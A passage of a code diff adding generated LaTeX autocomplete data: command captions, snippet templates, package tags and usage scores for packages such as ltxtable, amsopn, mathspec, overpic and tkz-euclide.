0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-3dplot-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-3dplot-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-3dplot-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-3dplot-cmd', + score: 0.2864294797053033, + }, + ], + ltxtable: [ + { + caption: '\\let', + snippet: '\\let', + meta: 'ltxtable-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'ltxtable-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'ltxtable-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'ltxtable-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'ltxtable-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ltxtable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'ltxtable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'ltxtable-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'ltxtable-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ltxtable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'ltxtable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ltxtable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'ltxtable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'ltxtable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'ltxtable-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'ltxtable-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ltxtable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ltxtable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'ltxtable-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'ltxtable-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'ltxtable-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'ltxtable-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'ltxtable-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'ltxtable-cmd', + score: 0.0313525090421608, + }, + ], + pict2e: [ + { + caption: '\\Line', + snippet: '\\Line', + meta: 'pict2e-cmd', + score: 0.0006078790177929149, + }, + { + caption: '\\polygon', + snippet: '\\polygon', + meta: 'pict2e-cmd', + score: 0.0008987552240147395, + }, + { + caption: '\\line', + snippet: '\\line', + meta: 'pict2e-cmd', + score: 0.014519741542622297, + }, + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'pict2e-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\vector', + snippet: '\\vector', + meta: 'pict2e-cmd', + score: 0.002970308722584179, + }, + ], + ltablex: [ + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'ltablex-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'ltablex-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'ltablex-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'ltablex-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ltablex-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'ltablex-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ltablex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'ltablex-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'ltablex-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\let', + snippet: '\\let', + meta: 'ltablex-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'ltablex-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'ltablex-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'ltablex-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'ltablex-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ltablex-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'ltablex-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'ltablex-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ltablex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ltablex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'ltablex-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'ltablex-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'ltablex-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'ltablex-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'ltablex-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'ltablex-cmd', + score: 0.0313525090421608, + }, + ], + amsopn: [ + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'amsopn-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'amsopn-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'amsopn-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'amsopn-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'amsopn-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'amsopn-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'amsopn-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'amsopn-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'amsopn-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'amsopn-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'amsopn-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'amsopn-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'amsopn-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'amsopn-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'amsopn-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'amsopn-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'amsopn-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'amsopn-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'amsopn-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'amsopn-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'amsopn-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'amsopn-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'amsopn-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'amsopn-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'amsopn-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'amsopn-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'amsopn-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'amsopn-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'amsopn-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'amsopn-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'amsopn-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'amsopn-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'amsopn-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'amsopn-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'amsopn-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'amsopn-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'amsopn-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'amsopn-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'amsopn-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'amsopn-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'amsopn-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'amsopn-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'amsopn-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'amsopn-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'amsopn-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'amsopn-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'amsopn-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'amsopn-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'amsopn-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'amsopn-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'amsopn-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'amsopn-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amsopn-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsopn-cmd', + score: 0.0063276692758974925, + }, + ], + topcoman: [ + { + caption: '\\listing{}', + snippet: '\\listing{$1}', + meta: 'topcoman-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\micro', + snippet: '\\micro', + meta: 'topcoman-cmd', + score: 0.011051971930487929, + }, + { + caption: '\\gradi', + snippet: '\\gradi', + meta: 'topcoman-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\unit[]{}', + snippet: '\\unit[$1]{$2}', + meta: 'topcoman-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\unit{}', + snippet: '\\unit{$1}', + meta: 'topcoman-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\ped{}', + snippet: '\\ped{$1}', + meta: 'topcoman-cmd', + score: 0.0007129548652040002, + }, + { + caption: '\\ohm', + snippet: '\\ohm', + meta: 'topcoman-cmd', + score: 0.0038146685721293138, + }, + { + caption: '\\gei', + snippet: '\\gei', + meta: 'topcoman-cmd', + score: 0.00023765162173466673, + }, + ], + topfront: [ + { + caption: '\\corsodilaurea{}', + snippet: '\\corsodilaurea{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeQuartoTomo{}', + snippet: '\\NomeQuartoTomo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\ciclodidottorato{}', + snippet: '\\ciclodidottorato{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\CorsoDiLaureaIn{}', + snippet: '\\CorsoDiLaureaIn{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\ateneo{}', + snippet: '\\ateneo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\retrofrontespizio{}', + snippet: '\\retrofrontespizio{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\InName{}', + snippet: '\\InName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\secondocandidato{}', + snippet: '\\secondocandidato{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeMonografia{}', + snippet: '\\NomeMonografia{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeTutoreAziendale{}', + snippet: '\\NomeTutoreAziendale{$1}', + meta: 'topfront-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\TutorName{}', + snippet: '\\TutorName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeDissertazione{}', + snippet: '\\NomeDissertazione{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\sedutadilaurea{}', + snippet: '\\sedutadilaurea{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\logosede{}', + snippet: '\\logosede{$1}', + meta: 'topfront-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\TesiDiLaurea{}', + snippet: '\\TesiDiLaurea{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeTerzoTomo{}', + snippet: '\\NomeTerzoTomo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\AdvisorName{}', + snippet: '\\AdvisorName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\facolta[]{}', + snippet: '\\facolta[$1]{$2}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\CycleName{}', + snippet: '\\CycleName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomePrimoTomo{}', + snippet: '\\NomePrimoTomo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\candidato{}', + snippet: '\\candidato{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\NomeSecondoTomo{}', + snippet: '\\NomeSecondoTomo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\titolo{}', + snippet: '\\titolo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\CandidateName{}', + snippet: '\\CandidateName{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\secondorelatore{}', + snippet: '\\secondorelatore{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\FacoltaDi{}', + snippet: '\\FacoltaDi{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\nomeateneo{}', + snippet: '\\nomeateneo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\DottoratoIn{}', + snippet: '\\DottoratoIn{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\sottotitolo{}', + snippet: '\\sottotitolo{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\relatore{}', + snippet: '\\relatore{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + { + caption: '\\tutoreaziendale{}', + snippet: '\\tutoreaziendale{$1}', + meta: 'topfront-cmd', + score: 0.00023765162173466673, + }, + ], + mathspec: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'mathspec-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'mathspec-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'mathspec-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'mathspec-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'mathspec-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'mathspec-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'mathspec-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'mathspec-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'mathspec-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'mathspec-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'mathspec-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mathspec-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'mathspec-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'mathspec-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'mathspec-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'mathspec-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'mathspec-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'mathspec-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'mathspec-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mathspec-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'mathspec-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'mathspec-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'mathspec-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'mathspec-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mathspec-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mathspec-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mathspec-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'mathspec-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mathspec-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mathspec-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'mathspec-cmd', + score: 0.0063276692758974925, + }, + ], + overpic: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'overpic-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'overpic-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'overpic-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'overpic-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'overpic-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'overpic-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'overpic-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'overpic-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'overpic-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'overpic-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'overpic-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'overpic-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'overpic-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'overpic-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'overpic-cmd', + score: 0.004719094298848707, + }, + ], + 'tkz-euclide': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-euclide-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'tkz-euclide-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tkz-euclide-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tkz-euclide-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-euclide-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-euclide-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tkz-euclide-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-euclide-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tkz-euclide-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + 